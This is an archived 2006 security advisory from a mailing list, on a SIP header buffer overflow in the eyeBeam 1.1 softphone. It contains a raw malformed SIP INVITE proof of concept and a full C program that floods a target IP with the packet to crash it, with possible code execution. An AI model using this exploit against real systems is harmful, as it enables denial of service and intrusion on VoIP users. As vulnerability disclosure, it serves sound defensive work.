Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] CounterPath eyeBeam SIP Buffer Overflow

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] CounterPath eyeBeam SIP Buffer Overflow
Date: 25 Jan 2006 10:01:51 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  CounterPath eyeBeam SIP Buffer Overflow
------------------------------------------------------------------------


SUMMARY

 <http://www.xten.net/index.php?menu=eyeBeam> eyeBeam is a SIP softphone 
supporting open standards for VoIP, Video and Instant Messaging.

CounterPath eyeBeam does not handle SIP headers correctly allow attackers 
to crash the system and execute arbitrary code using buffer overflow.

DETAILS

Vulnerable Systems:
 * eyeBeam version 1.1

A buffer overflow in eyeBeam exists while handing SIP header with a large 
field name.

Proof of Concept:
INVITE sip:a@127.0.0.1 SIP/2.0
Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119
From: 1249 <sip:a@127.0.0.1>;tag=1249
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Receiver 
<sip:100012@172.16.1.1>
Call-ID: 4166@<172.16.3.6>   <--Change it to target IP
CSeq: 18571 INVITE
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 130

v=0
o=1249 1249 1249 IN IP4 127.0.0.1
s=Session SDP
c=IN IP4 127.0.0.1
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000

If an attacker send a packet several times to eyeBeam when it's starting 
and have no call operation, then it will crashed for reading an invalid 
address which can be controlled by the attacker.

If the attacker sends it several times when it's in a call, then eyeBeam 
will not be responsive when dialing or getting calls, and may crash when 
writing an address, and my also execute arbitrary code.

Exploit:
/*********************************************************
eyeBeam handling SIP header DOS POC
Author : ZwelL
Email : zwell@sohu.com
Blog : http://www.donews.net/zwell
Data : 2006.1.15
*********************************************************/

#include <stdio.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

char *sendbuf1 =
"INVITE sip:a@127.0.0.1 SIP/2.0\r\n"
"Via: SIP/2.0/UDP 
127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119\r\n"
"From: test <sip:a@127.0.0.1>;tag=1249\r\n"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaa: test <sip:a@127.0.0.1>\r\n";

char *sendbuf2 =
"CSeq: 18571 INVITE\r\n"
"Expires: 1200\r\n"
"Max-Forwards: 70\r\n"
"Content-Type: application/sdp\r\n"
"Content-Length: 130\r\n"
"\r\n"
"v=0\r\n"
"o=1249 1249 1249 IN IP4 127.0.0.1\r\n"
"s=Session SDP\r\n"
"c=IN IP4 127.0.0.1\r\n"
"t=0 0\r\n"
"m=audio 9876 RTP/AVP 0\r\n"
"a=rtpmap:0 PCMU/8000\r\n";

int main(int argc, char **argv)
{
    WSADATA wsaData;
    SOCKET    sock;
    sockaddr_in RecvAddr;
        char sendbuf[4096];
        int iResult;
        int port = 8376; //default is 8376, but SIP's default port is 5060

        printf("eyeBeam handling SIP header DOS POC\nAuthor : ZwelL\n");
        printf("Email : zwell@sohu.com\nBlog : 
http://www.donews.net/zwell\n\n";);
        if(argc < 2)
        {
                printf("Usage : %s <target ip> [port]\n", argv[0]);
                return 0;
        }

        if(argc == 3)
                port = atoi(argv[2]);

    iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    if (iResult != NO_ERROR)
        {
        printf("Error at WSAStartup()\n");
                return 0;
        }

        sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

        ZeroMemory(&RecvAddr, sizeof(RecvAddr));
    RecvAddr.sin_family = AF_INET;
    RecvAddr.sin_port = htons((short)port);
    RecvAddr.sin_addr.s_addr = inet_addr(argv[1]);

        printf("Target is : %s\t port is : %d\r\n", argv[1], port);
        for(int i=0; i<20; i++)
        {
                sprintf(sendbuf, "%sCall-ID: 4166@<%s>\r\n%s", sendbuf1, 
argv[1], sendbuf2);
                if(SOCKET_ERROR == sendto(sock,
                                sendbuf,
                                strlen(sendbuf),
                                0,
                                (SOCKADDR *) &RecvAddr,
                                sizeof(RecvAddr)))
                {
                        printf("sendto wrong:%d\n", WSAGetLastError());
                        continue;
                }
        }
    
        printf("Now check the target is crafted?\r\n");

    WSACleanup();
    return 1;
}

/* EoF */


ADDITIONAL INFORMATION

The information has been provided by  <mailto:zwell@sohu.com> ZwelL.
The original article can be found at:  
<http://blog.donews.com/zwell/archive/2006/01/17/698810.aspx> 
http://blog.donews.com/zwell/archive/2006/01/17/698810.aspx



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] CounterPath eyeBeam SIP Buffer Overflow, SecuriTeam <=
Previous by Date:  [NT] WEP Open Authentication Information Disclosure, SecuriTeam
Next by Date:  [NEWS] Computer Associates iTechnology iGateway Service Content-Length Buffer Overflow, SecuriTeam
Previous by Thread:  [NT] WEP Open Authentication Information Disclosure, SecuriTeam
Next by Thread:  [NEWS] Computer Associates iTechnology iGateway Service Content-Length Buffer Overflow, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]